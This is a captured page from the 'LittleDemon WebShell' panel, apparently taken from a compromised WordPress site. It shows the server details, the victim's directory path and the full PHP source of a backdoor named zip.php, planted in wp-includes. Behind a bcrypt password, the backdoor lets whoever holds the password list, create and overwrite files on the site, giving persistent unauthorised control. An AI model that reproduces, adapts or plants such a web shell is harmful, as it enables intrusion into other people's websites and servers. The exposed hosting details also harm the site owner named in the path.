LittleDemon WebShell


Linux premium77.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
Path : /home/azadtmyo/azadfoundation.org/wp-includes/
File Upload :
Command :
Current File : /home/azadtmyo/azadfoundation.org/wp-includes/zip.php

<?php
// Enable error reporting for development (disable in production)
error_reporting(E_ALL);
ini_set('display_errors', 1);

// Start session for authentication
session_start();

// Settings
$secureAccess = true;
$hashedPassword = '$2a$12$wMwpjdVF1koCjqvlTKPlGeZ1aiJjnroho58ICR9FC18nWsUFQh3Lq'; // Replace with your bcrypt hash

// Authentication check
if ($secureAccess) {
    if (!isset($_SESSION['access_granted']) || $_SESSION['access_granted'] !== true) {
        if (isset($_POST['access_code'])) {
            if (password_verify($_POST['access_code'], $hashedPassword)) {
                $_SESSION['access_granted'] = true;
            } else {
                die('
                <!DOCTYPE html>
                <html lang="en">
                <head>
                    <meta charset="UTF-8">
                    <meta name="viewport" content="width=device-width, initial-scale=1.0">
                    <title>Access Denied</title>
                    <script src="https://cdn.tailwindcss.com"></script>
                </head>
                <body class="bg-gray-100 min-h-screen flex items-center justify-center">
                    <div class="bg-white p-8 rounded-lg shadow-lg w-full max-w-md">
                        <h2 class="text-2xl font-bold mb-6 text-center text-gray-800">Access Required</h2>
                        <form method="POST">
                            <input type="password" name="access_code" class="w-full p-2 border rounded mb-4 focus:outline-none focus:ring-2 focus:ring-blue-500" placeholder="Enter access code" required autofocus>
                            <button type="submit" class="w-full bg-blue-500 text-white p-2 rounded hover:bg-blue-600 transition">Login</button>
                        </form>
                    </div>
                </body>
                </html>
                ');
            }
        } else {
            echo '
            <!DOCTYPE html>
            <html lang="en">
            <head>
                <meta charset="UTF-8">
                <meta name="viewport" content="width=device-width, initial-scale=1.0">
                <title>Access Denied</title>
                <script src="https://cdn.tailwindcss.com"></script>
            </head>
            <body class="bg-gray-100 min-h-screen flex items-center justify-center">
                <div class="bg-white p-8 rounded-lg shadow-lg w-full max-w-md">
                    <h2 class="text-2xl font-bold mb-6 text-center text-gray-800">Access Required</h2>
                    <form method="POST">
                        <input type="password" name="access_code" class="w-full p-2 border rounded mb-4 focus:outline-none focus:ring-2 focus:ring-blue-500" placeholder="Enter access code" required autofocus>
                        <button type="submit" class="w-full bg-blue-500 text-white p-2 rounded hover:bg-blue-600 transition">Login</button>
                    </form>
                </div>
            </body>
            </html>
            ';
            exit;
        }
    }
}

// Restrict file explorer to its own directory for security
$baseDir = __DIR__;
$notice = ''; // Notification message for user
$noticeType = 'success'; // Notification type (success or error)

// --- Handle Form Submissions ---

// Check for POST requests (file creation or saving)
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // 1. Create New File
    if (isset($_POST['make_file']) && !empty($_POST['file_name'])) {
        // Security: Sanitize file name to prevent directory traversal
        $newFile = basename($_POST['file_name']);
        $filePath = $baseDir . '/' . $newFile;

        if (!file_exists($filePath)) {
            // Create an empty file
            if (touch($filePath)) {
                $notice = htmlspecialchars($newFile) . " successfully created.";
                $noticeType = 'success';
            } else {
                $notice = "Failed to create file. Check permissions.";
                $noticeType = 'error';
            }
        } else {
            $notice = htmlspecialchars($newFile) . " already exists.";
            $noticeType = 'error';
        }
    }
    // 2. Save File (Edit)
    elseif (isset($_POST['update_file']) && !empty($_POST['file_name'])) {
        // Security: Sanitize file name
        $fileName = basename($_POST['file_name']);
        $filePath = $baseDir . '/' . $fileName;
        $data = $_POST['data'];

        // Ensure file is writable
        if (is_writable($filePath)) {
            if (file_put_contents($filePath, $data) !== false) {
                $notice = htmlspecialchars($fileName) . " successfully saved.";
                $noticeType = 'success';
            } else {
                $notice = "Error saving file.";
                $noticeType = 'error';
            }
        } else {
            // Prevent editing this script itself
            if ($filePath === __FILE__) {
                $notice = "Cannot edit this script for security reasons.";
            } else {
                $notice = "File is not writable. Check permissions.";
            }
            $noticeType = 'error';
        }
    }
}

// --- Determine View ---

// Check for 'edit' parameter in GET request (file editing view)
$activeFile = null;
if (isset($_GET['modify'])) {
    $fileToModify = basename($_GET['modify']);
    $filePath = $baseDir . '/' . $fileToModify;

    // Verify file exists, is not a directory, and is readable
    if (file_exists($filePath) && !is_dir($filePath) && is_readable($filePath)) {
        // Prevent editing this script itself
        if ($filePath === __FILE__) {
            $notice = "Cannot edit this script for security reasons.";
            $noticeType = 'error';
        } else {
            $activeFile = $fileToModify;
        }
    } else {
        $notice = "File not found or not readable.";
        $noticeType = 'error';
    }
}
?>

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>File Explorer</title>
    <script src="https://cdn.tailwindcss.com"></script>
    <style>
        body {
            font-family: system-ui, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, sans-serif;
            background-color: #f4f6f9;
            color: #2d3748;
            margin: 0;
            padding: 20px;
        }
        .wrapper {
            max-width: 900px;
            margin: 0 auto;
            background-color: #ffffff;
            border: 1px solid #e2e8f0;
            border-radius: 8px;
            padding: 20px;
            box-shadow: 0 2px 4px rgba(0, 0, 0, 0.05);
        }
        h1, h2 {
            border-bottom: 2px solid #edf2f7;
            padding-bottom: 10px;
            color: #2d3748;
        }
        .notification {
            padding: 15px;
            margin-bottom: 20px;
            border-radius: 5px;
            font-weight: bold;
        }
        .notification.success {
            background-color: #e6ffed;
            color: #276749;
            border: 1px solid #c6f4d5;
        }
        .notification.error {
            background-color: #fff1f0;
            color: #9b2c2c;
            border: 1px solid #fed7d7;
        }
        ul {
            list-style-type: none;
            padding: 0;
        }
        li {
            padding: 10px 15px;
            border-bottom: 1px solid #edf2f7;
            display: flex;
            justify-content: space-between;
            align-items: center;
        }
        li:last-child {
            border-bottom: none;
        }
        li span.item-name {
            font-weight: 500;
        }
        li a {
            text-decoration: none;
            color: #3182ce;
            font-weight: bold;
        }
        li a:hover {
            text-decoration: underline;
        }
        .folder {
            color: #4a5568;
            font-weight: bold;
        }
        .input-group {
            margin-bottom: 15px;
        }
        label {
            display: block;
            margin-bottom: 5px;
            font-weight: bold;
        }
        input[type="text"], textarea {
            width: 100%;
            padding: 10px;
            border: 1px solid #e2e8f0;
            border-radius: 5px;
            box-sizing: border-box;
        }
        textarea {
            height: 400px;
            font-family: "Courier New", Courier, monospace;
            font-size: 14px;
        }
        .btn, button {
            background-color: #3182ce;
            color: white;
            padding: 10px 15px;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            font-size: 16px;
            text-decoration: none;
            display: inline-block;
        }
        .btn:hover, button:hover {
            background-color: #2b6cb0;
        }
        .btn.cancel {
            background-color: #718096;
        }
        .btn.cancel:hover {
            background-color: #5a667a;
        }
        .action-buttons {
            margin-top: 20px;
        }
    </style>
</head>
<body class="bg-gray-100 min-h-screen">
    <div class="wrapper">
        <h1>File Explorer</h1>
        <p><strong>Current Directory:</strong> <?php echo htmlspecialchars($baseDir); ?></p>

        <?php if ($notice): ?>
            <div class="notification <?php echo $noticeType; ?>"><?php echo $notice; ?></div>
        <?php endif; ?>

        <?php if ($activeFile): // File Editing View ?>
            <?php
                $filePath = $baseDir . '/' . $activeFile;
                // Security: Escape file content for HTML
                $data = htmlspecialchars(file_get_contents($filePath));
            ?>
            <h2>Editing File: <?php echo htmlspecialchars($activeFile); ?></h2>
            <form action="" method="POST">
                <input type="hidden" name="file_name" value="<?php echo htmlspecialchars($activeFile); ?>">
                <div class="input-group">
                    <label for="data">File Content</label>
                    <textarea id="data" name="data"><?php echo $data; ?></textarea>
                </div>
                <div class="action-buttons">
                    <button type="submit" name="update_file" class="btn">Save Changes</button>
                    <a href="?" class="btn cancel">Back</a>
                </div>
            </form>
        <?php else: // Main View (File List and Creation) ?>
            <h2>Create New File</h2>
            <form action="" method="POST">
                <div class="input-group">
                    <label for="file_name">File Name:</label>
                    <input type="text" id="file_name" name="file_name" required placeholder="example.txt">
                </div>
                <button type="submit" name="make_file" class="btn">Create</button>
            </form>

            <h2>Files and Folders</h2>
            <ul>
                <?php
                // Scan directory
                $entries = scandir($baseDir);
                foreach ($entries as $entry) {
                    // Skip '.' and '..' entries
                    if ($entry === '.' || $entry === '..') {
                        continue;
                    }
                    $entryPath = $baseDir . '/' . $entry;
                    if (is_dir($entryPath)) {
                        echo '<li><span class="folder">[FOLDER] ' . htmlspecialchars($entry) . '</span></li>';
                    } else {
                        echo '<li>
                                <span class="item-name">' . htmlspecialchars($entry) . '</span>
                                <a href="?modify=' . urlencode($entry) . '">Edit</a>
                              </li>';
                    }
                }
                ?>
            </ul>
        <?php endif; ?>
    </div>
</body>
</html>

LittleDemon - FACEBOOK
[ KELUAR ]